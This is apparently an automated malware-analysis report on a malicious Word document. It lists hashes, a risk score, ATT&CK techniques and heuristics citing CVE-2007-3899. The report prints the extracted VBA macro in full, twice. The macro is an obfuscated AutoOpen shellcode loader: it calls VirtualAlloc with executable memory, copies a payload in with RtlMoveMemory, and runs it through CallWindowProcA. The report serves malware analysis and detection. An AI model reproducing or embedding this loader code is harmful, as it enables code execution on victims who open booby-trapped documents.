Office (OLE) malware analysis — malicious · f49a3797cb597609

MALICIOUS

Office (OLE)

205.5 KB Created: 2016-08-15 12:01:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: dbb376f0c4884c592985cfa257d77f72 SHA-1: b4d195e58a6a3bf2a659a80bdccc64d038e8a33d SHA-256: f49a3797cb597609ed41941ecae441cc8e44f2f549921b29cc3e990b2f03591f

128 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages the CVE-2007-3899 vulnerability. This vulnerability allows for memory corruption, which is then used to execute arbitrary code, as indicated by the VirtualAlloc API call. The presence of an AutoOpen macro further supports the execution of malicious code upon opening the document.

Heuristics 5

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
#If Win64 Then
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4887 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4887 bytes
SHA-256: `5c8cc20be26920e5ed9df757ed3f1e9bc52356c27050bb72253a6b342f5b0e75`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "billionth" Attribute VB_Base = "0{65FD4CCB-2882-4F75-8FBE-35ACD8E7F162}{ECC71634-AEB4-4CE3-90B3-D8104B8212AF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{B5A6F9A0-2069-4DF9-80ED-1083063A27C2}{4C1A4ED9-C27B-4116-A6DD-80CE9D65D1EC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If Win64 Then Private Declare PtrSafe Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr Private Declare PtrSafe Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr) Private Declare PtrSafe Function malay Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String) Private Declare PtrSafe Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr Private Declare PtrSafe Function viviparous Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr Private Declare PtrSafe Function functus Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr Private Declare PtrSafe Function headwaters Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr #Else Private Declare Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function twentythird Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long Private Declare Function chopin Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String) Private Declare Function tost Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long Private Declare Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long Private Declare Function unselected Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long #End If Sub trac() Dim blnTrackChangesOn As Boolean blnTrackChangesOn = ActiveDocument.TrackRevisions ActiveDocument.TrackRevisions = False ActiveDocument.TrackRevisions = blnTrackChangesOn End Sub Sub exmoor() Dim combat As Variant Dim nekton As Variant apartments = billionth.choline produced = maria.comparative(apartments) subtilin = 88 colonialist = 80 If subtilin + colonialist < 88 Then subtilin = "as" + StrReverse("itec") + Left("cismaged", 4) kentish = Left("acassuring", 2) & "arine" Else colonialist = 68 End If bonesetter = "detrain" nontropical = "barleysugar" #If Win64 Then Dim indifference As LongPtr #Else Dim indifference As Long #End If osier = 0 indifference = maison(osier, 4574, &H1000, &H40) heronry = "scimitar" idaho = "eloquent" Dim atilt As String excise = "meliorism" atilt = ActiveDocument.FullName ambrosial = 115 + 52 - 162 Select Case ambrosial Case 1 To 10 harms = "insured" halter = "bearings" Case 11 congou = "deliberative" Case 14 acetylenic = "enjoyable" pervert = "lollipop" End Select Dim townsman() As Byte townsman = produced faulkner = LCase("eth") & LCase("nOgRaphy") talapoin ByVal indifference, townsman(0), UBound(townsman) + 1 setose = "interfering" #If Win64 Then Dim vermifuge As Variant exulcerate = "cebuan" bandwidth = "scombridae" scurfy = "relative" disburdened = 576 #ElseIf Win32 Then disburdened = 2214 #End If Dim caller As String Dim gnathostome As String lome = hairbrush(ByVal indifference + disburdened, atilt, 0, 0, 0) avesta = 125 + 84 - 204 Select Case avesta Case 1 To 11 locum = "monodrame" filing = "damaging" copse = "basketball" Case 12 cuisinecordon = "fitter" Case 14 oreortyx = "turns" End Select End Sub Sub AutoOpen() #If Win64 Then exmoor #ElseIf Win32 Then busker = "avolation" exmoor #Else #End If End Sub

SHA-256: 5c8cc20be26920e5ed9df757ed3f1e9bc52356c27050bb72253a6b342f5b0e75

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "billionth"
Attribute VB_Base = "0{65FD4CCB-2882-4F75-8FBE-35ACD8E7F162}{ECC71634-AEB4-4CE3-90B3-D8104B8212AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B5A6F9A0-2069-4DF9-80ED-1083063A27C2}{4C1A4ED9-C27B-4116-A6DD-80CE9D65D1EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function malay Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function viviparous Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
Private Declare PtrSafe Function functus Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Function headwaters Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr

#Else
Private Declare Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function twentythird Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function chopin Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Function tost Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
Private Declare Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Function unselected Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long

#End If
Sub trac()
    Dim blnTrackChangesOn As Boolean
    blnTrackChangesOn = ActiveDocument.TrackRevisions
    ActiveDocument.TrackRevisions = False
    ActiveDocument.TrackRevisions = blnTrackChangesOn
End Sub

Sub exmoor()
Dim combat As Variant
Dim nekton As Variant
apartments = billionth.choline
produced = maria.comparative(apartments)
subtilin = 88
colonialist = 80
If subtilin + colonialist < 88 Then
subtilin = "as" + StrReverse("itec") + Left("cismaged", 4)
kentish = Left("acassuring", 2) & "arine"
Else
colonialist = 68
End If

bonesetter = "detrain"
nontropical = "barleysugar"
#If Win64 Then
Dim indifference As LongPtr
#Else
Dim indifference As Long
#End If
osier = 0
indifference = maison(osier, 4574, &H1000, &H40)
heronry = "scimitar"
idaho = "eloquent"
Dim atilt As String
excise = "meliorism"
atilt = ActiveDocument.FullName
ambrosial = 115 + 52 - 162
Select Case ambrosial
Case 1 To 10
harms = "insured"
halter = "bearings"
Case 11
congou = "deliberative"
Case 14
acetylenic = "enjoyable"
pervert = "lollipop"
End Select

Dim townsman() As Byte
townsman = produced
faulkner = LCase("eth") & LCase("nOgRaphy")
talapoin ByVal indifference, townsman(0), UBound(townsman) + 1
setose = "interfering"
#If Win64 Then
Dim vermifuge As Variant
exulcerate = "cebuan"
bandwidth = "scombridae"
scurfy = "relative"
disburdened = 576
#ElseIf Win32 Then
disburdened = 2214
#End If
Dim caller As String
Dim gnathostome As String
lome = hairbrush(ByVal indifference + disburdened, atilt, 0, 0, 0)
avesta = 125 + 84 - 204
Select Case avesta
Case 1 To 11
locum = "monodrame"
filing = "damaging"
copse = "basketball"
Case 12
cuisinecordon = "fitter"
Case 14
oreortyx = "turns"
End Select

End Sub

Sub AutoOpen()
#If Win64 Then
exmoor
#ElseIf Win32 Then
busker = "avolation"
exmoor
#Else
#End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.